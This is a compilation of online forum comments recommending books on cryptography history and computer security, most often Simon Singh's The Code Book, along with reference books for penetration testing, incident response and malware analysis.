To be fair, it's not unreasonable to call in their history.

Check out this link as a good starter: http://en.wikipedia.org/wiki/Export_of_cryptography_from_the_United_States

I'm not sure if you know much about crypto (I'm a huge crypto fan, especially of it's history). If you are ever interested -- check out this book: http://smile.amazon.com/dp/0385495323

It's a fantastic read.

I'm also a big fan of Simon Singh's The Code Book because he included ten encoded messages at the end offering a prize to the first person to break them. It took over a year from the book's release for someone to solve them.

"The Code Book" by Simon Singh is a really great introduction via the history of cryptography. It covers a lot of old codes and how they are broken in detail, and then touches on more modern cryptography towards the end. It has a great bibliography to springboard you toward more detailed knowledge.

One I've recommended before for someone graduating is Cracking the Coding Interview. One other that's on my reading list is this book on the history of cryptography, I haven't read it yet but it looks fascinating.

There's an interesting book about encryption that I read a few years ago that discusses exactly this. [The Code Book by Simon Singh] (http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323).

Anyone interested in encryption and how it has evolved should read this book. bobcobb42 is absolutely right, some of the modern encryption techniques such as RSA are near impossible to break if applied correctly. In RSA two very large (the larger the better) prime numbers are multiplied to encrypt data. As long as the prime numbers used to encrypt the data are kept secret then the process of finding those number and reversing the encryption would take many many powerful computers working many many years to break. The reason for this is because to find the original prime numbers that were multiplied to get they key very large numbers would have to be factored, which is very hard to do since their is currently no algorithm that is known to do this.

IIRC the government actually gave the inventors of RSA or Diffie-Hellman, one of the two, a really hard time over their encryption because they couldn't break it so they didn't want it public.

There are two basic types:

• Symmetric (secret key algorithm, like AES)
  
• Asymmetric (where you have public and private keys. RSA, DH etc)
  
  If you want to enjoy reading about encryption. checkout the book by Simon Singh: The Code Book
  

Reverse Code Engineering. Down the rabbit hole you go!

I'm not sure how to tell you where to start with cryptography. For the kind of stuff they've been doing so far in the footers, it's enough to just understand binary numbering. The rest is mostly intuition.

The Caesar cipher is an example of a shift cipher, which in turn is a subset of the broader category of substitution ciphers. You should probably familiarize yourself with how to use frequency analysis to break classic substitution ciphers. The next major evolution of ciphers was the vigenere cipher. During WWI, Germany used the ADFGVX. Even now, breaking it is not trivial if the key is sufficiently long.

On the modern, digital side of things, encryption algorithms generally fall into two categories: block ciphers (ex. AES, DES, Blowfish, etc.) and stream ciphers. You should probably learn what hashing algorithms are (ex. MD5, SHA-1). If you want to crack hashes these days, you'll want to know about rainbow tables.

If you're looking for a good laymen's introduction, I recommend The Code Book by Simon Singh.

The Code Book was really good as well!

For what I can tell, it should be GD. They made an error. Not terribly uncommon. I made one in a geocache challenge and I was left wondering why nobody could find it. There is an excellent book on cryptography called "Codebreakers" that had a really fun cipher challenge but he goofed on the PKE and made it basically impossible to solve.

A good book about computer viruses in general is The Little Black Book of Computer Viruses. A bit dated now perhaps, but it's a good read, all the same. Full text is here apparently, though it says it is an 'Electronic Edition'.

This is one of my favorite books on elliptic curve cryptography, just thought I'd pass it along

http://www.amazon.com/Elliptic-Curves-Cryptography-Mathematics-Applications/dp/1420071467


Have you studied much about elliptic curves? Their application to cryptography is really cool.

Make your life easier and order this...

http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504

I use it for pentesting, but it is a solid small reference book with Linux commands, as well as Windows and others.

You can always grab the O'Reilly Linux book, but this is much more portable and has room for notes.

$8.

There was a really excellent section on exactly this in the code book if you're interested in some reading about it. But the book is more generally about the history of cryptography and codebreaking...

It went over a lot of the history of figuring out Egyptian hieroglyphs and one or two other ancient languages with little to no clues about their meaning and interpretation. Sorry I don't remember the specifics...

These might interest you:

Poincare's Prize


Prime Obsession


Fermat's Enigma

The Code Book

> creating a strong cryptography algorithm is primarily trial and error

I don't think it's trial and error, more like a series of steps in which each is designed to befuddle a particular class of attack that may have been successful on previous iterations. This sort of goes back to the Cold War and even WWII—a code like Enigma was the scramblers and the plugboard, where the plugboard was specifically added to foil a type of dictionary attack.

Anyhow, not that I really know too much about it, but this is a fantastic book on the topic.

https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323/ref=asap_bc?ie=UTF8

This book is great. I read it a number of years ago and couldn't get enough.

No idea if it's the book you're talking about, but The Code Book has a large section on the Enigma Code. It's a great layman's introduction to cryptology that goes through both the math and the history of several major cryptological innovations. I can't recommend it enough.

Really great book: https://www.amazon.com/Threat-Modeling-Designing-Adam-Shostack/dp/1118809998/ref=sr_1_1?ie=UTF8&qid=1506015037&sr=8-1&keywords=threat+modeling

In addition to illusory script and other magical solutions (possibly even layered on top of them for added security), check out some historical spy stuff:

https://en.wikipedia.org/wiki/Steganography

I also really recommend The Code Book:

https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323/

I'd be very surprised if you haven't heard or got these given your certs! Either way highly recommend the Blue Team Field Manual and Red Team Field Manual

The Code Book by Simon Singh

This book is amazing...it started my love of cryptography and secrets....and taught me how behind the scenes these things have been shaping history in ways we don't always see.

The cryptography course is the one I'm really excited about. I read the red book when I was like 19, and I've been waiting for that course ever since.

I first heard about the french 'La disparition' and the translated 'A Void' in The Code Book by Simon Singh (which in itself is a great book) in the chapter describing frequency analysis with regard to cryptanalysis. [With 'e' being the most frequently used letter in english.]

I enjoyed Big Bang very much. I have also been recommended here another book by the same author: The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography

The blue team field manual is a great book

Edit:
Here's the link
https://www.amazon.com/dp/154101636X/ref=cm_sw_r_cp_api_gz4-zbSCWC8E4

Applied Cryptography by Bruce Schneier.

Yes it's older, but it will get you up to speed with the concepts.

I think the book really is the gold standard when it comes to introducing cryptography. I read it cover-to-cover in 1999 and it really explains everything well. I used encryption software before that, but this explains how it all works.

Is there an English translation of Codes? I can only seem to find German versions.


I really enjoyed The Code Book by Singh (it's basically a history of cryptography).

Don't know if anyone will see this now that it's Tuesday, but I'm looking for a recommendation for a book on the history of cryptography. Right now I've found The Codebreakers (expensive) and The Code Book. Does anyone have any experience with these books, or in the subject generally that can offer other suggestions? Thanks a ton.

Check out The Code Book by Simon Singh. It is about the history of cryptography, but along the way, it also has some history of computing, and it's an entertaining read.

Read: Applied Cryptography by Bruce Schneier. Goes through implementation and attack details on several older algorithms, as well as all sorts of cool applications. It's an older book, but the older algorithms are easier to understand and start with.

The Code Book by Simon Singh.

Amazing history and explanation of cryptography, all the way from ancient ciphers to theorized quantum stuff.

The Code Book is exactly what you are looking for. Very fun read, very informative.

This little guy is amazing. And cheap.

Have you read Blue Team Handbook? It could be a good place to start and I'm guessing your company can swing you $15

If you enjoy Simon Singh, check out The Code Book.

Educate yourselves! Anybody know a better layman's book than The Code Book?

http://i.imgur.com/ICg0lMH.png

The Code Book. Very entertaining, too.

Somebody told me, so I'm telling you: The Code Book is where it's at. Very easy to read and understand and will answer your questions.

This is one of my security starter trifecta:

Hacking: The Art of Exploitation

Rtfm: Red Team Field Manual

Blue Team Handbook: Incident Response Edition

Some good readings from the University of Cambridge Mathematical reading list and p11 from the Studying Mathematics at Oxford Booklet both aimed at undergraduate admissions.

I'd add:

Prime obsession by Derbyshire. (Excellent)

The unfinished game by Devlin.

Letters to a young mathematician by Stewart.

The code book by Singh

Imagining numbers by Mazur (so, so)

and a little off topic:

The annotated turing by Petzold (not so light reading, but excellent)

Complexity by Waldrop

Cyberwar by Richard Clarke is a good read to get your feet wet.

http://www.amazon.com/gp/aw/d/0061962244/ref=pd_aw_sims_1?pi=SY115&simLd=1

The blue team handbook is good too

https://www.amazon.com/Blue-Team-Handbook-condensed-Responder/dp/1500734756

A good text for beginners is Simon Singh's The Code Book.

The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography is a good book to learn the history and some of the concepts behind cryptography.

The Code Book by Simon Singh is a nice, informal introduction to cryptography including modern day cryptography.

I highly recommend this for anyone in netsec: http://www.amazon.com/Blue-Team-Handbook-condensed-Responder/dp/1500734756

Everything you ever wanted to know about cryptography (but not necessarily all cryptographic algorithms) is in Practical Cryptography. If that doesn't fill your cup, then put on your big-boy pants and dive into Applied Cryptography. You will note that Brian Schneier is a common author between those two books. There is a reason for that. :-)

I bought this one and like it a lot. It even comes with a disk with some neutered examples to analyze.

Here is the explanation that stuck with me. It's from a mathematician here on Reddit and it made /r/bestof a year ago: https://www.reddit.com/r/math/comments/3tn1xq/what_intuitively_obvious_mathematical_statements/cx7np4t/

Also, check out The Code Book by Simon Singh for a fascinating history of how encryption got to where we are today, and where we are going.

The Code Book - Read it for our digital security class in college.

Amazon Link

Although it is more of a story book than a textbook.

The book ComSec does this. Turns out the preferred device seems to be an iPod.

ComSec: Off-The-Grid Communication Strategies for Privacy Enthusiasts, Journalists, Politicians, Crooks, and the Average Joe https://www.amazon.com/dp/1722124784/ref=cm_sw_r_cp_api_wGm9BbVCA1CGD

Tails USBs also do a decent job.

Those are paid books, This subreddit is not for piracy(See sidebar) but incase you couldn't find them on Amazon:

http://www.amazon.com/Firewalls-Dont-Dragons-Step-Step-ebook/dp/B00SIA1RH4


http://www.amazon.com/Blue-Team-Handbook-Condensed-Responder/dp/1500734756

Add a Malware Analysis section to books and punch in Malware Analyst's Cookbook. ;)

http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033

I would also add in OS hardening some where and link to NSA's guides:

http://www.nsa.gov/ia/mitigation_guidance/security_configuration_guides/operating_systems.shtml

https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323/ref=nodl_

I purchased this book at the recommendation from a fellow raid secrets subscriber and I’m not huge fan of reading. Very cool book that goes thru the history of cryptography.

I've read a few books about WW2 tech and I can't remember exactly which one talked about it - it may have been Alan Turing: The Enigma, or perhaps Simon Singh's The Code Book. I tried searching online but I can't find anything for some reason :/ I hope whichever book wrote about it didn't make it up.

Appears to be the logo for the Red Team Field Manual. Twitter page here. Amazon link to the book here. This is a reference book for common command line tools used in the security field. Penetration testers would use this, red team / blue team scenario participants, etc.

"Red team" is the common term used for the "bad guys" in security training scenarios. Having a hard copy reference is nice because you are many times operating blind, crafting complex command groups without being able to see the output or reference the man page.

My recommendations then for self study:

• http://www.amazon.com/The-Rootkit-Arsenal-Evasion-Corners/dp/144962636Xl
  
  
• http://www.amazon.com/Windows-Forensic-Analysis-Toolkit-Edition/dp/0124171575
  
  
• http://www.amazon.com/Windows-Registry-Forensics-Advanced-Forensic/dp/1597495808
  
  
• http://www.amazon.com/Malware-Rootkits-Botnets-Beginners-McGraw/dp/0071792066
  
  
• http://www.amazon.com/Practical-Reverse-Engineering-Reversing-Obfuscation/dp/1118787315
  
  
• http://www.amazon.com/Practical-Malware-Analysis-Dissecting-Malicious/dp/1593272901
  
  
• http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
  
  
• http://www.amazon.com/The-IDA-Pro-Book-Disassembler/dp/1593272898
  
  
• http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033
  
  Read all those and you will be in good shape ;)
  EDIT: I hate trying to get reddit to do what I want.

If you want to know more about how Turing cracked the Enigma Machine, i suggest to read this really nice book :

http://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323

http://www.amazon.com/Cyber-War-Threat-National-Security/dp/0061962244/ref=sr_1_1?ie=UTF8&qid=1377714175&sr=8-1&keywords=Cyberwar

This is the book I read it in.

Everyday Cryptography

http://www.amazon.co.uk/Everyday-Cryptography-Fundamental-Principles-Applications/dp/0199695598

Start here:

https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323

What's the difference between this one and this one?

Depending on age, The Code Book is a very approachable history and introduction to cryptography.

For those wanting to learn more about how this quantum photon based encryption came about, and much more, check out The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography.

Your Inner Fish

How to Teach Physics to Your Dog

The Universe and Dr. Einstein

The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography

Article: http://www.bbc.co.uk/history/topics/enigma

Movie: The imitation game

Book : Simon Singh - The Code Book

https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323/ref=mp_s_a_1_2/138-6683061-6847431?ie=UTF8&qid=1541615715&sr=8-2&pi=AC_SX236_SY340_FMwebp_QL65&keywords=simon+singh&dpPl=1&dpID=51CC3yLf5mL&ref=plSrch

is it this one?

https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323

This one: https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323

http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323

The Code Book, which is a nonfiction book about the history and mathematics of secret codes and how to break them, ranging from the earliest and simplest codes, up through the Engima machine and the first computers, through modern RSA, PGP, and (the hypothetically unbreakable) Quantum Cryptography.

https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323

For reverse engineering:

1. http://www.amazon.com/Practical-Reverse-Engineering-Reversing-Obfuscation/dp/1118787315/ref=sr_1_1?s=books&ie=UTF8&qid=1450459302&sr=1-1&keywords=reverse+engineering
   
   
2. http://www.amazon.com/Reversing-Secrets-Engineering-Eldad-Eilam/dp/0764574817/ref=sr_1_2?s=books&ie=UTF8&qid=1450459302&sr=1-2&keywords=reverse+engineering
   
   
3. http://www.amazon.com/IDA-Pro-Book-Unofficial-Disassembler/dp/1593272898/ref=sr_1_7?s=books&ie=UTF8&qid=1450459302&sr=1-7&keywords=reverse+engineering
   
   For malware analysis and malware techniques
   
   
4. http://www.amazon.com/Practical-Malware-Analysis-Hands--Dissecting/dp/1593272901/ref=sr_1_10?s=books&ie=UTF8&qid=1450459302&sr=1-10&keywords=reverse+engineering
   
   
5. http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033/ref=sr_1_2?s=books&ie=UTF8&qid=1450459367&sr=1-2&keywords=malware+analysis
   
   
6. http://www.amazon.com/Art-Memory-Forensics-Detecting-Malware/dp/1118825098/ref=sr_1_5?s=books&ie=UTF8&qid=1450459367&sr=1-5&keywords=malware+analysis
   
   For programming
   
   
7. Complete Reference C and Complete Reference C++
   
8. NASM Manual
   
   
9. Intel Software Developer Manual (http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html)
   
   This should be enough for you to get started.

There's also a book https://www.amazon.com/Threat-Modeling-Designing-Adam-Shostack/dp/1118809998

From what I gather, it has to do with hacking computers. http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=pd_rhf_se_s_cp_4_XYAH?ie=UTF8&refRID=1JBCRB3Q9672J44NKK9A

It's actually a thing.

http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504

Just tell him to go read the R.T.F.M. book